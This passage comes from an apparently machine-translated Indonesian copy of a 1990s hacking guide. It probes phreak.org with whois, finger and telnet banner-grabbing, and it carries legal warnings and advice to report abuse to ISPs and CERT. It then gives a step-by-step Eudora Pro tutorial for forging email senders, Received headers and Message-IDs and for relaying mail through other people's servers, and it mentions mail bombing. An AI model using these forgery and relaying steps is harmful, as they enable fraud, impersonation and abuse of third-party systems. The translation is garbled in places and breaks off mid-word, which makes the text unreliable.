mode, Anda dapat dengan cepat mematikannya dengan menahan tombol kontrol sambil menekan tombol "c".
***************************
***************************
Anda dapat masuk ke penjara peringatan: Jika dapat ditunjukkan bahwa Anda menjalankan perintah ping-f dengan sengaja untuk
mengambil
komputer host yang Anda targetkan, ini adalah penolakan serangan layanan dan karenanya ilegal.
************************
OK, sekarang kami telah menetapkan bahwa setidaknya saat ini, http://phreak.com baik tidak ada, atau yang lain
hosting komputer itu tidak terhubung ke Internet.
Tetapi apakah ini sementara atau hilang, hilang, hilang? Kita bisa mengetahui apakah itu sudah naik dan turun
dan banyak dibaca dari mesin pencari di http://altavista.digital.com. Ia dapat mencari tautan yang disematkan
di halaman Web. Apakah ada banyak situs Web dengan tautan ke phreak.org? Saya memasukkan perintah pencarian:
tautan: http://www.phreak.org
host: http://www.phreak.org
Tetapi mereka tidak menghasilkan apa-apa. Jadi sepertinya situs phreak.org tidak terlalu populer.
Nah, apakah phreak.org punya catatan di Internic? Mari kita coba whois:
whois phreak.org
Phreaks, Inc. (PHREAK-DOM)
Phreaks, Inc.
1313 Mockingbird Lane
San Jose, CA 95132 AS
Nama Domain: PHREAK.ORG
Kontak Administratif, Kontak Penagihan:
Connor, Patrick (PC61) pc@PHREAK.ORG
(408) 262-4142
Kontak Teknis, Kontak Zona:
Hall, Barbara (BH340) rain@PHREAK.ORG
408.262.4142
Rekor terakhir diperbarui pada 06-Feb-96.
Rekor dibuat pada 30-Apr-95.
Server domain dalam urutan yang tercantum:
PC.PPP.ABLECOM.NET
204.75.33.33

Halaman 106
ASYLUM.ASYLUM.ORG
205.217.4.17
NS.NEXCHI.NET
204.95.8.2
Selanjutnya saya tunggu beberapa jam dan ping kembali phreak.org. Saya menemukan sekarang hidup. Jadi sekarang kita telah
mempelajarinya
komputer hosting phreak.org kadang-kadang terhubung ke Internet dan kadang tidak. (Bahkan nanti
menyelidik menunjukkan bahwa itu sering turun.)
Saya mencoba telnetting ke urutan login mereka:
telnet phreak.org
Mencoba 204.75.33.33 ...
Terhubung ke phreak.org.
Karakter melarikan diri adalah '^]'.
______________ _______________________________ __
___ __ \ __ / / / __ __ \ __ ____ / __ | __ // _ / ____________________ _
__ / _ / / _ / _ / / __ / _ / / _ __ / __ / | | _, <_ __ \ _ ___ / _ __ `/
_ ____ / _ __ / _ _, _ / _ / ___ _ ___ | / | | __ / / _ / / / _ / _ / /
/ _ / / _ / / _ / / _ / | _ | / _____ / / _ / | _ / _ / | _ | (_) ____ // _ / _ \ __, /
/ ____ /
;
Koneksi ditutup oleh tuan rumah asing.
Aha! Seseorang telah menghubungkan komputer hosting phreak.org ke Internet!
Fakta bahwa ini hanya memberikan seni ASCII dan tidak ada prompt masuk menunjukkan bahwa komputer host ini tidak
persis menyambut pengunjung biasa. Mungkin memiliki firewall yang menolak upaya login dari siapa pun yang
telnet masuk dari host yang tidak ada dalam daftar yang disetujui.
Selanjutnya saya mencari kontak teknis mereka:
finger rain@phreak.org
Responsnya adalah:
[phreak.org]
Itu kemudian menggulirkan beberapa seni ASCII yang memalukan. Finger sendiri jika Anda benar-benar ingin melihatnya. Saya
hanya akan menilai
namun PG-13.
Fakta bahwa phreak.org menjalankan layanan jari menarik. Karena jari adalah salah satu cara terbaik untuk menembus
suatu sistem, kita dapat menyimpulkan bahwa:
1) Sysadmin phreak.org tidak terlalu sadar akan keamanan, atau
2) Sangat penting bagi phreak.org untuk mengirim pesan yang menghina sehingga sysadmin tidak peduli tentang itu
risiko keamanan menjalankan jari.
Karena kita telah melihat bukti tembok api, kasus 2 mungkin benar.

Halaman 107
Salah satu anggota daftar Hacker Bahagia yang membantu saya dengan meninjau Panduan ini, William Ryan, memutuskan untuk
melakukannya
selidiki lebih lanjut port jari phreak.org:
"Saya telah memperhatikan semua hal" hacker senang "yang telah Anda posting. Ketika saya mencoba
menggunakan metode port 79 di phreak.org, ia menghubungkan dan kemudian menampilkan tangan dengan jari tengah terangkat
dan komentar "HATI ANDA." Ketika saya mencoba menggunakan jari, saya masuk dan pesan ditampilkan
tak lama kemudian "Dalam kehidupan nyata ???" "
Oh, ini * terlalu * menggoda ... ah, tapi mari kita keluar dari masalah dan biarkan port 79 itu sendirian, oke?
Sekarang, bagaimana dengan port HTML mereka, yang akan memberikan akses ke situs Web mana saja yang dihosting oleh
phreak.org? Kita
bisa saja memunculkan program berselancar Web dan melihatnya. Tapi kami adalah peretas dan peretas tidak pernah melakukan
hal yang bodoh
cara biasa. Selain itu, saya tidak ingin melihat foto-foto kotor dan kata-kata nakal. Jadi kami memeriksa untuk melihat apakah itu
aktif dengan, Anda dapat menebaknya, berselancar port kecil:
telnet phreak.org 80
Inilah yang saya dapatkan:
Mencoba 204.75.33.33 ...
Terhubung ke phreak.org.
Karakter melarikan diri adalah '^]'.
HTTP / 1.0 400 Permintaan Buruk
Server: thttpd / 1.00
Jenis konten: teks / html
Terakhir diubah: Kamis, 22-Agustus-96 18:54:20 GMT
<HTML><HEAD> <TITLE> 400 Permintaan Buruk </TITLE> </HEAD>
<BODY> <H2> 400 Permintaan Buruk </H2>
Permintaan Anda '' memiliki sintaksis buruk atau secara inheren tidak mungkin dipenuhi.
<HR>
<ADDRESS> <A HREF="http://www.acme.org/software/thttpd/"> thttpd / 1,00 </A> </ ADDRESS
</BODY> </HTML>
Koneksi ditutup oleh tuan rumah asing.
Sekarang kita tahu bahwa phreak.org memiliki server web di komputer inangnya. Server ini disebut thttpd,
versi 1.0. Kami juga mungkin curiga bahwa ini agak buggy!
Apa yang membuat saya berpikir itu buggy? Lihatlah nomor versi: 1.0. Juga, itu pesan kesalahan yang cukup aneh.
Jika saya adalah administrator teknis untuk phreak.org, saya akan mendapatkan program yang lebih baik berjalan pada port 80
sebelumnya
seseorang memikirkan bagaimana cara membobolnya. Masalahnya adalah bahwa kode kereta sering merupakan gejala
kode yang mengambil pendekatan malas menggunakan panggilan ke root. Dalam hal server Web, Anda ingin memberikan read-
hanya akses ke pengguna jarak jauh di direktori pengguna file html mana pun. Jadi ada godaan besar untuk menggunakan
panggilan
untuk root.
Dan sebuah program dengan panggilan untuk me-root mungkin saja crash dan membuang Anda ke root.
************************
Catatan pemula: Root! Ini adalah Valhalla dari hard -core cracker. "Root" adalah akun pada multi-pengguna
komputer yang memungkinkan Anda bermain dewa. Anda menjadi "pengguna super"! Ini adalah akun yang dapat Anda gunakan
masukkan dan gunakan akun lain apa pun, baca dan modifikasi file apa pun, jalankan program apa pun. Dengan akses root, Anda
bisa
hancurkan semua data di boring.ISP.net atau host lain di mana Anda mendapatkan root. (Saya tidak*
menyarankan agar Anda melakukannya!)

Halaman 108
***************************
Oh, ini terlalu menggoda. Saya melakukan satu percobaan kecil:
telnet phreak.org 80
Ini memberi:
Mencoba 204.75.33.33 ...
Terhubung ke phreak.org.
Karakter melarikan diri adalah '^]'.
Karena program pada port 80 kali keluar dari perintah dalam sedetik atau kurang, saya siap untuk melakukan paste
perintah host, yang dengan cepat memasukkan perintah berikut:
<ADDRESS> <A HREF="http://www.phreak.org/thttpd/"> thttpd / 1,00 </A> </ADDRESS</BODY> </HTML>
Ini memberikan informasi tentang program port 80 phreak.org:
HTTP / 1.0 501 Tidak Diimplementasikan
Server: thttpd / 1.00
Jenis konten: teks / html
Terakhir diubah: Kamis, 22 Agustus-96 19:45:15 GMT
<HTML><HEAD> <TITLE> 501 Tidak Diimplementasikan </TITLE> </HEAD>
<BODY> <H2> 501 Tidak Diimplementasikan </H2>
Metode yang diminta '<ADDRESS> <A' tidak diterapkan oleh server ini.
<HR>
<ADDRESS> <A HREF="http://www.acme.org/software/thttpd/"> thttpd / 1,00 </A> </ ADDRESS
</BODY> </HTML>
Koneksi ditutup oleh tuan rumah asing.
Baiklah, apa itu thttpd? Saya melakukan pencarian cepat di Altavista dan mendapatkan jawabannya:
Server HTTP kecil, portabel, cepat, dan aman. Server HTTP kecil / turbo / pelambatan tidak bercabang dan sedang
sangat berhati-hati tentang memori ...
Tetapi apakah programmer mengetahui bagaimana melakukan semua ini tanpa panggilan untuk root? Hanya untuk iseng saya
mencoba mengakses
URL acme.org dan dapatkan pesan "tidak memiliki entri DNS." Tapi whois memberitahuku itu
terdaftar di Internic. Hmm, ini terdengar lebih seperti perangkat lunak merek X. Dan itu berjalan di port.
Kota pembobolan! Godaan apa ... arghhh ...
Juga, sekali lagi kita melihat kepribadian ganda yang menarik. Sysadmin phreak.org cukup peduli
keamanan untuk mendapatkan server Web yang diiklankan sebagai "aman." Tetapi perangkat lunak itu menunjukkan gejala
utama menjadi a
risiko keamanan!
Jadi apa yang bisa kita simpulkan? Sepertinya phreak.org memang memiliki situs Web. Tapi itu hanya secara sporadis
terhubung ke Internet.
Sekarang anggaplah kita memang menemukan berita buruk yang serius di phreak.org. Misalkan seseorang ingin
matikan itu. Ah-ah-ah, jangan sentuh port kereta 80 itu! Atau port yang menggoda 79! Ping di moderasi, hanya!
********************************

Halaman 109
Anda bisa masuk penjara catatan: Apakah Anda tergoda seperti saya? Orang-orang ini memiliki cracker highway 79 port terkenal
buka, DAN port buggy 80! Tetapi, sekali lagi, saya katakan kepada Anda, melanggar hukum untuk masuk ke non-publik
bagian dari komputer. Jika Anda melakukan telnet melalui jalur negara bagian AS, itu adalah kejahatan federal. Bahkan jika
Anda berpikir ada
sesuatu yang ilegal di server thttpd itu, hanya seseorang yang dipersenjatai dengan surat perintah pencarian yang berhak
melihatnya
lebih dari akun root.
********************************
Pertama, jika sebenarnya ada masalah dengan phreak.org (ingat, ini hanya digunakan sebagai ilustrasi) I
akan mengirim email keluhan ke kontak teknis dan administrasi ISP yang menyediakan phreak.org
koneksi ke Internet. Jadi saya melihat untuk melihat siapa mereka:
whois PC.PPP.ABLECOM.NET
Saya mendapat respons:
[Tidak ada nama] (PC12-HST)
Hostname: PC.PPP.ABLECOM.NET
Alamat: 204.75.33.33
Sistem: Sun 4/110 menjalankan SunOS 4.1.3
Rekam terakhir diperbarui pada 30-Apr-95
Dalam hal ini, karena tidak ada kontak yang terdaftar, saya akan mengirim email ke postmaster@ABLECOM.NET.
Saya memeriksa ISP berikutnya:
whois ASYLUM.ASYLUM.ORG
Dan dapatkan:
[Tidak ada nama] (ASYLUM4-HST)
Hostname: ASYLUM.ASYLUM.ORG
Alamat: 205.217.4.17
Sistem:? berlari?
Rekam terakhir diperbarui pada 30-Apr-96.
Sekali lagi, saya akan mengirim email ke postmaster@ASYLUM.ORG
Saya memeriksa ISP terakhir:
whois NS.NEXCHI.NET
Dan dapatkan:
NEXUS-Chicago (BUDDH-HST)
1223 W North Shore, Suite 1E
Chicago, IL 60626
Hostname: NS.NEXCHI.NET
Alamat: 204.95.8.2
Sistem: Sun menjalankan Unix

Halaman 110
Koordinator:
Torres, Walter (WT51) walter-t@MSN.COM
312-352-1200
Rekor terakhir diperbarui pada 31-Des-95.
Jadi dalam hal ini saya akan mengirim email walter-t@MSN.COM dengan bukti materi yang menyinggung. Saya juga akan
mengirim email
keluhan ke postmaster@PC.PPP.ABLECOM.NET dan postmaster @ ASYLUM.ASYLUM.ORG.
Itu dia. Alih-alih mengobarkan perang hacker yang semakin meningkat yang akhirnya bisa membuat orang dijebloskan ke
penjara, dokumentasikan
masalah Anda dengan situs web dan minta mereka yang memiliki kekuatan untuk memotong orang-orang ini untuk melakukan
sesuatu.
Ingat, Anda dapat membantu melawan penjahat dunia maya jauh lebih baik dari komputer Anda daripada yang Anda bisa
dari sel penjara.
***************************
Peringatan Netiquette: Jika Anda hanya ingin tahu apakah thttpd dapat dibuat untuk root,
* JANGAN * menjalankan percobaan di komputer phreak.org. Sysadmin mungkin akan memperhatikan semua yang aneh itu
mengakses port 80 pada file log shell. Dia akan menganggap Anda mencoba untuk masuk, dan akan mengeluh
ke ISP Anda. Anda mungkin akan kehilangan akun Anda.
***************************
***************************
Catatan Genius Jahat: Gejala bisa diretas yang kita lihat di thttpd adalah jenis tantangan intelektual
yang membutuhkan instalasi Linux di PC Anda. Setelah Anda mendapatkan Linux, Anda dapat menginstal thttpd. Maka kamu
mungkin
bereksperimen dengan impunitas total.
Jika Anda harus menemukan bug di thttpd yang secara serius membahayakan keamanan komputer yang menjalankannya, maka
Apa yang kamu kerjakan? Hapus file html dari phreak.org? TIDAK! Anda menghubungi Tanggap Darurat Komputer
Tim (CERT) di http://cert.org dengan informasi ini. Mereka akan mengirimkan peringatan. Anda akan menjadi pahlawan dan
dapat mengenakan biaya besar sebagai konsultan keamanan komputer. Ini jauh lebih sulit daripada pergi ke penjara.
Percayalah kepadaku.
************************
Panduan untuk (kebanyakan) Hacking Tidak Berbahaya
Vol. 1 No. 7
Cara Menempa Email Menggunakan Eudora Pro
_________________________________________________________
Salah satu trik peretasan yang paling populer adalah memalsukan email. Orang suka memalsukan teman mereka dengan
mengirim
mereka email yang sepertinya dari Bill_Gates@microsoft.com, santa@north.pole.org, atau
beelzebub@heck.mil. Sayangnya, spammer dan yang tidak diinginkan lainnya juga suka email palsu sehingga mudah
mereka lolos dengan membanjiri akun email kita dengan sampah.
Berkat masalah ini, sebagian besar program email adalah warga internet yang baik. Pegasus, yang berjalan
Windows, dan Pine, yang berjalan di Unix, rewel dalam menjaga orang-orang dari penyalahgunaan mereka. Sudahkah anda
pernah mencoba memalsukan email menggunakan Compuserve atau AOL? Saya takut untuk mengatakan sesuatu tidak mungkin
diretas,
tetapi program-program email itu semuanya menolak upaya saya.
Saya akan mengakui bahwa fitur nama layar America OnLine memungkinkan seseorang bersembunyi di balik semua jenis
pegangan.
Tetapi untuk penempaan email kekuatan industri ada Eudora Pro untuk Windows 95, hadiah Qualcomm untuk Internet
dan program email paling kejam dan paling buruk di sekitar.

Halaman 111
************************************************ *****
Dalam Panduan ini Anda akan belajar cara menggunakan Eudora Pro untuk mengirim email palsu. Ini akan mencakup cara
memalsukan:
· Siapa yang mengirim surat
· Header ekstra untuk memalsukan rute yang diambil melalui Internet
· Bahkan ID pesan!
· Dan hal lain yang dapat Anda bayangkan
· Plus, cara menggunakan Eudora untuk mengirim email Anda dari komputer orang lain - suka atau tidak.
· Plus - apakah mungkin menggunakan Eudora untuk pemboman surat?
************************************************ *****************
Beberapa haxor Super Duper akan melihat bab ini dan segera mulai mengolok-oloknya. Mereka akan menganggap saya
hanya akan mengajarkan hal-hal yang jelas, seperti bagaimana cara mengirim pengirim palsu di email Anda.
Tidak mungkin. Ini hal serius. Misalnya, lihat tajuk lengkap email ini:
Jalur Pengembalian: <cmeinel@techbroker.com>
Diterima: dari kizmiaz.fu.org (root@kizmiaz.fu.org [206.14.78.160])
oleh Foo66.com (8.8.6 / 8.8.6) dengan id ESMTP VAA09915
untuk <cpm@foo66.com>; Sab, 13 Sep 1997 21:54:34 -0600 (MDT)
Diterima: dari Anteros (pmd08.foo66.com [198.59.176.41])
oleh kizmiaz.fu.org (8.8.5 / 8.8.5) dengan SMTP id UAA29704
untuk <cpm@foo66.com>; Sab, 13 Sep 1997 20:54:20 -0700 (PDT)
Tanggal: Sab, 13 Sep 1997 20:54:20 -0700 (PDT)
Message-Id: <2.2.16.19970913214737.530f0502@ayatollah.ir>
diterima: dari emout09.mail.ayatollah.ir (emout09.mx.aol.com [198.81.11.24]) oleh Foo66.com (8.8.6 / 8.8.6) dengan
ESMTP id MAA29967 untuk <cpm@foo66.com>; Senin, 8 Sep 1997 12:06:09 -0600 (MDT)
Warna favorit: pirus
X-Pengirim: meinel@ayatollah.ir (Tidak Diverifikasi)
X-Mailer: Windows Eudora Pro Versi 2.2 (16)
Mime -Versi: 1.0
Jenis-Konten: teks / polos; charset = "us-ascii"
Ke: cpm@foo66.com
Dari: Carolyn Meinel <cmeinel@techbroker.com>
Subjek: Tes segalanya palsu
Saya benar-benar mengirim email ini melalui koneksi PPP dengan akun saya cpm@foo66.com kepada saya pada saat yang sama
alamat. Ya, email ini dimulai dan berakhir di komputer yang sama. Namun, jika Anda membaca tajuknya, ini
email sepertinya dikirim oleh komputer bernama Anteros, lalu pergi ke kizmiaz.fu.org, lalu ayatollah.ir.
Pengirim, itu melaporkan, tidak diverifikasi tetapi tampaknya meinel@ayatollah.ir.
Yang menarik adalah ID pesan. Banyak orang, bahkan sysadmin dan peretas berpengalaman,
berasumsi bahwa bahkan dengan email palsu, nama komputer di akhir ID pesan adalah komputer menyala
yang mana emailnya ditulis, dan komputer yang menyimpan catatan siapa lelaki itu yang memalsunya.
Tetapi Anda dapat dengan cepat membuktikan dengan Eudora Pro bahwa Anda dapat memalsukan ID pesan yang merujuk
hampir semua
komputer, termasuk komputer yang tidak ada.
Beberapa Panduan ini jelas amatiran. Untuk ratusan dolar, Anda dapat membeli program email dari a
perusahaan spammer yang akan memalsukan email lebih baik dan memompanya lebih cepat. Tetap saja, ini pembelajaran untuk
menempa email
Eudora menggambarkan banyak prinsip dasar pemalsuan email.
Mari kita mulai dengan alamat email pengirim. Saya mengelola sendiri tiga alamat palsu di email ini:
meinel@ayatollah.ir
cmeinel@techbroker.com

Halaman 112
cpm@foo66.com
Hanya yang terakhir ini, cpm@foo66.com, "nyata." Dua lainnya saya masukkan sendiri.
Ada penggunaan yang sah untuk kekuatan ini. Dalam kasus saya, saya memiliki beberapa ISP tetapi ingin semuanya
dikembalikan
ke alamat email saya di domain saya sendiri, techbroker.com. Tapi alamat ayatollah itu murni lelucon. Ini dia
bagaimana saya memasukkan nama-nama itu.
1) Di Eudora, klik "alat" lalu "opsi." Ini akan membuka menu.
2) Klik “Informasi Pribadi.” Untuk memalsukan email, Anda dapat membuat semua entri ini palsu.
3) Alamat yang Anda masukkan di bawah "Akun Pop" adalah tempat Anda memberi tahu Eudora di mana harus mencari email
Anda.
Tapi coba tebak? Saat Anda mengirim email, Anda bisa memasukkan host palsu di sana. Saya menempatkan "ayatollah.ir." Ini
menghasilkan baris di header, "Message-Id: <2.2.16.19970913214737.530f0502@ayatollah.ir>." Beberapa
orang berpikir ID pesan adalah cara terbaik untuk melacak email palsu. Kirimkan saja sysadmin ke
ayatollah.ir, kan? Salah!
4) "Nama asli" dan "Alamat kembali" adalah apa yang muncul di baris tajuk "Dari: Carolyn Meinel
<cmeinel@techbroker.com> ”dan“ Return-Path: <cmeinel@techbroker.com>. ”Saya bisa saja membuat mereka palsu.
Jika itu palsu, orang tidak dapat membalas Anda dengan memberikan perintah "balas" di program email mereka.
5) Selanjutnya, ketika masih pada pilihan pull-down, gulir ke bawah ke "mengirim surat." Coba tebak, di bawah "SMTP
Server, ”Anda tidak harus memasukkan ISP yang menawarkan Anda untuk mengirim email. Dengan sedikit
Eksperimen Anda dapat menemukan ratusan - ribuan - jutaan - komputer lain yang dapat Anda gunakan
kirim email ke Namun, ini harus komputer nyata yang benar-benar akan mengirim email Anda. aku ambil
kizmiaz.fu.org untuk yang satu ini. Itu menyumbang baris header:
Diterima: dari kizmiaz.fu.org (root@kizmiaz.fu.org [206.14.78.160])
oleh Foo66.com (8.8.6 / 8.8.6) dengan id ESMTP VAA09915
untuk <cpm@foo66.com>; Sab, 13 Sep 1997 21:54:34 -0600 (MDT)
Diterima: dari Anteros (pmd08.foo66.com [198.59.176.41])
oleh kizmiaz.fu.org (8.8.5 / 8.8.5) dengan SMTP id UAA29704
untuk <cpm@foo66.com>; Sab, 13 Sep 1997 20:54:20 -0700 (PDT)
Cara Membuat Header Ekstra dan Berpura-pura Jalan melalui Internet
Tapi mungkin ini tidak membuat header yang cukup aneh untukmu. Ingin menjadikan surel Anda lebih fonier? Bahkan
pengguna Eudora yang benar-benar berpengalaman jarang tahu tentang cara membuat tajuk tambahan, jadi ini cara yang bagus
untuk ditampilkan
mati.
1) Buka Windows Explorer dengan mengklik "mulai," lalu "program," lalu "Windows Explorer."
2) Di sebelah kiri adalah daftar direktori. Klik pada Eudora.
3) Di sebelah kanan adalah semua direktori dan file di Eudora. Gulir ke bawah ke file. Klik
"Eudora.ini."
4) Eudora.ini sekarang di Notepad dan siap diedit.
5) Perbaiki dengan menambahkan baris saat menuju ke baris yang berjudul “extra headers =“ di dalam [Dialup]. Setelah "="
ketikkan sesuatu seperti ini:
extraheaders = diterima: dari emout09.mail.ayatollah.ir (emout09.mx.aol.com [198.81.11.24]) oleh Foo66.com
(8.8.6 / 8.8.6) dengan ESMTP id MAA29967 untuk <cpm@foo66.com>; Senin, 8 Sep 1997 12:06:09 -0600 (MDT)

Halaman 113
Dengan pengaturan ini, semua email Anda yang keluar dari Eudora akan menyertakan baris itu di header. Anda dapat
menambahkan sebagai
banyak tajuk tambahan ke email Anda seperti yang Anda inginkan dengan menambahkan baris baru yang juga dimulai dengan
“tajuk ekstra =”. Untuk
contoh, dalam hal ini saya juga menambahkan "Warna favorit: pirus."
************************************************ ****
Anda dapat masuk ke penjara peringatan: Masih ada cara bagi para ahli untuk mengetahui dari mana Anda mengirim email ini.
Jadi jika
seseorang harus menggunakan email palsu untuk menipu, mengancam atau mengirimkan bom kepada orang, hati-hati terhadap
teman satu selnya
bernama Spike.
************************************************ *****************
Apakah Mungkin untuk Mengirim Bom Menggunakan Eudora?
Cara yang jelas untuk mengirimkan bom dengan Eudora tidak berhasil. Cara yang jelas adalah dengan meletakkan alamat Anda
korban ke daftar alamat beberapa ribu kali dan kemudian melampirkan file yang sangat besar. Tetapi hasilnya hanya akan terjadi
satu pesan pergi ke alamat itu. Ini bukan berkat Eudora itu sendiri. Daemon mail yang umum digunakan pada
Internet seperti sendmail, smail, dan qmail hanya memungkinkan satu pesan dikirim ke setiap alamat per email.
Tentu saja ada cara yang lebih baik untuk memalsukan email dengan Eudora. Juga, ada cara yang sangat sepele untuk
menggunakan Eudora
untuk mengirim ratusan file terlampir raksasa ke satu penerima, menabrak server email ISP korban. Tapi
Saya tidak memberi tahu Anda caranya karena ini, bagaimanapun, adalah sebuah Panduan untuk (kebanyakan) Peretasan Tidak
Berbahaya.
Tapi lain kali Global KOS dudes mencoba menipu Anda agar menggunakan salah satu program pembom surat mereka
(mereka mengklaim program-program ini akan membuat Anda tetap anonim tetapi sebenarnya Anda akan ketahuan) hanya ingat
semua
yang mereka lakukan adalah mengemas barang-barang yang siapa pun yang tahu dua trik sederhana bisa melakukan jauh lebih
baik
Eudora. (Jika Anda seorang profesional keamanan komputer yang sah, dan Anda ingin bergabung dengan kami di Infowar untuk
menyelesaikannya
masalahnya, hubungi saya untuk detail dan kami akan memikirkan apakah akan mempercayai Anda.)
**********************************************
Jahat Genius Tip: Ini mailbomber thingy mematikan adalah fitur, ya, jujur-to-gosh FITUR dimaksudkan, dari
sendmail. Keluarkan manual Anda dan pelajari.
**********************************************
Kemudahan yang satu dapat menempa surat yang sempurna dan melakukan pemboman surat yang merusak seluruh surat ISP
server dan bahkan mematikan penyedia tulang punggung Internet seperti yang baru-baru ini terjadi pada AGIS mungkin
menjadi ancaman terbesar yang dihadapi Internet saat ini. Saya tidak senang mengungkapkan ini banyak. Sayangnya
masalah pemalsuan surat adalah kesalahan yang mendarah daging dalam struktur dasar Internet. Jadi hampir tidak mungkin
jelaskan dasar-dasar peretasan tanpa mengungkapkan kepingan-kepingan itu pada teka-teki pemalsuan yang sempurna dan
sempurna
mailbombing.
Jika Anda mengetahuinya, jadilah pria yang baik dan jangan menyalahgunakannya, oke? Menjadi salah satu dari kami orang
dalam yang melihat masalah -
- dan ingin memperbaikinya daripada mengeksploitasinya untuk keserakahan atau kebencian.
Isi Volume 2:
Internet untuk Dummies
Linux!
Pengantar TCP / IP
Berselancar di Port!
____________________________________________________________
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Vol. 2 Angka 1

Halaman 114
Internet untuk Dummies - lewati ini jika Anda seorang penyihir Unix. Tetapi jika Anda membaca terus, Anda akan mendapatkan
lebih banyak kewl
instruksi peretasan.
____________________________________________________________
Enam Panduan untuk (kebanyakan) Peretasan Tidak Berbahaya dari Vol. 1 segera melompat ke trik cara meretas. Tapi jika
Anda seperti saya, semua detail port yang menyelidik dan bermain dengan hipotesis dan menerima host
sedikit pusing.
Jadi bagaimana dengan mengatur napas, berdiri dan memeriksa apa sih yang sedang kita mainkan?
Setelah kita menguasai dasar-dasarnya, kita kemudian dapat beralih ke peretasan serius.
Juga, saya telah bergulat dengan hati nurani saya tentang apakah akan mulai memberi Anda petunjuk langkah demi langkah
tentang cara mendapatkan akses root ke komputer orang lain. Malaikat kecil di bahu kananku berbisik,
“Mendapatkan root tanpa izin di komputer orang lain tidak baik. Jadi jangan beri tahu orang bagaimana melakukannya
itu. ”Setan kecil di bahu kiri saya berkata,“ Carolyn, semua peretas ini mengira kamu tidak tahu apa-apa!
BUKTI kepada mereka, kamu tahu bagaimana memecahkannya! "Malaikat kecil itu berkata," Jika ada yang membaca Panduan
untuk (kebanyakan)
Peretasan Tidak Berbahaya mencoba trik ini, Anda mungkin mendapat masalah dengan hukum karena konspirasi merusak yang
lain
komputer orang. "Iblis kecil itu berkata," Tapi, Carolyn, beri tahu orang-orang bagaimana cara membobol root dan mereka akan
melakukannya
pikir kamu KEWL! ”
Jadi, inilah kesepakatannya. Dalam hal ini dan beberapa masalah berikutnya dari Panduan untuk (kebanyakan) Peretasan Tidak
Berbahaya saya akan memberi tahu Anda beberapa
cara untuk masuk sebagai pengguna super di akun root dari beberapa komputer host Internet. Tetapi
instruksi akan meninggalkan satu atau dua hal ke imajinasi.
Teori saya adalah bahwa jika Anda bersedia mengarungi semua ini, Anda mungkin bukan salah satu dari sensasi murah itu
wannabes peretas yang akan menggunakan pengetahuan ini untuk melakukan sesuatu yang merusak yang akan membuat Anda
dipenjara.
*******************************
Kiat teknis: Jika Anda ingin menjadi peretas * serius *, Anda memerlukan Linux (beragam freeware Unix) di
PC Anda. Satu r>
-------------------------------------------------- ----------------------
Transfer terputus!
o rooting secara legal semua yang Anda inginkan - di komputer Anda sendiri. Itu pasti mengalahkan berdetak pada orang lain
komputer hanya untuk menemukan bahwa apa yang Anda pikir root adalah jebakan pintar dan sysadmin dan FBI
menertawakanmu sampai ke penjara.
Linux dapat diinstal pada PC dengan CPU 386, hanya 2 Mb RAM dan hard drive hanya 20 MB
disk. Anda harus memformat ulang hard disk Anda. Sementara beberapa orang telah berhasil menginstal Linux tanpa
mencemari barang-barang DOS / Windows mereka, jangan berharap lolos begitu saja. Cadangan, pencadangan, pencadangan!
*******************************
*******************************
Anda dapat masuk ke penjara peringatan: Crack ke root pada komputer orang lain dan slammer menjadi pasti
kemungkinan. Pikirkan tentang ini: ketika Anda melihat berita tentang peretas yang tertangkap, seberapa sering
Anda mengenali namanya? Seberapa sering payudara terbaru dilakukan pada seseorang yang terkenal, seperti Dark Tangent atau
se7en atau Emmanuel Goldstein? Bagaimana, seperti, tidak pernah! Itu karena peretas yang sangat baik mencari caranya
tidak melakukan hal-hal bodoh. Mereka belajar bagaimana meretas komputer untuk tantangan intelektual dan mencari tahu
cara membuat komputer aman dari penyusup. Mereka tidak berusaha keras untuk mengakar dan mengacaukan banyak hal,
yang cenderung menginspirasi sysadmin untuk memanggil polisi.
*********************************

Halaman 115
Pemberitahuan menarik: Apakah terlalu membosankan untuk hanya meretas ke mesin Linux Anda sendiri? Tetap bertahan. Ira
Winkler dari
Asosiasi Keamanan Komputer Nasional, Dekan Garlick dari Space Dynamics Lab dari Universitas Negeri Utah
dan saya sedang mengerjakan pengaturan hack.net, tempat yang legal untuk membobol komputer. Tidak hanya itu,
kami sedang mencari sponsor yang akan memberikan penghargaan uang tunai dan beasiswa untuk mereka yang menunjukkan
yang terbaik
keterampilan peretasan. Sekarang apakah itu terdengar lebih seperti phun daripada penjara?
*******************************
Jadi, mari kita lompat ke tutorial dasar peretasan kami dengan melihat anarki yang menakjubkan yaitu Internet.
Perhatikan bahwa Panduan ini untuk (kebanyakan) Hacking Tidak Berbahaya fokus di Internet. Itu karena ada banyak
cara legal untuk meretas di Internet. Juga, ada lebih dari 10 juta dari komputer yang mudah diretas ini di Internet
Internet, dan jumlahnya bertambah setiap hari.
Dasar-Dasar Internet
Tidak ada yang memiliki Internet. Tidak ada yang menjalankannya. Tidak pernah direncanakan menjadi seperti sekarang ini. Itu
baru saja terjadi
hasil mutan dari percobaan Badan Penelitian Proyek Penelitian Pertahanan Lanjutan AS 1969.
Sistem anarkis ini tetap terikat karena penggunanya secara sukarela mematuhi beberapa aturan dasar. Aturan ini
dapat diringkas dalam dua kata: Unix dan TCP / IP (dengan anggukan ke UUCP). Jika kamu mengerti, sungguh
memahami Unix dan TCP / IP (dan UUCP), Anda akan menjadi ikan yang berenang di lautan dunia maya, sebuah
Uberhacker di antara wannabes peretas, penguasa dunia Internet.
Untuk mendapatkan teknis, Internet adalah jaringan komputer / komunikasi terdistribusi di seluruh dunia yang disatukan
oleh standar komunikasi umum, Protokol Kontrol Transmisi / Protokol Internet (TCP / IP) dan sedikit
dari UUCP. Standar-standar ini memungkinkan siapa saja untuk menghubungkan komputer ke Internet, yang kemudian menjadi
simpul lain di jaringan Internet ini. Semua yang diperlukan adalah untuk mendapatkan alamat Internet yang ditugaskan ke
Internet
komputer baru, yang kemudian dikenal sebagai "host" Internet, dan mengikat ke dalam tautan komunikasi Internet.
Tautan ini sekarang tersedia di hampir semua bagian dunia.
Jika Anda menggunakan layanan online dari komputer pribadi Anda, Anda juga dapat sementara menjadi bagian dari
Internet. Ada dua cara utama untuk terhubung ke layanan on-line.
Ada koneksi kentang cybercouch yang digunakan setiap pemula. Ini membutuhkan point-to-point (PPP)
atau koneksi SLIP, yang memungkinkan Anda untuk menjalankan gambar-gambar cantik dengan browser Web Anda. Jika Anda
punya semacam
paket perangkat lunak dari ISP Anda, secara otomatis memberi Anda koneksi semacam ini.
Atau Anda dapat terhubung dengan emulator terminal ke host Internet. Program ini mungkin sesuatu yang sederhana
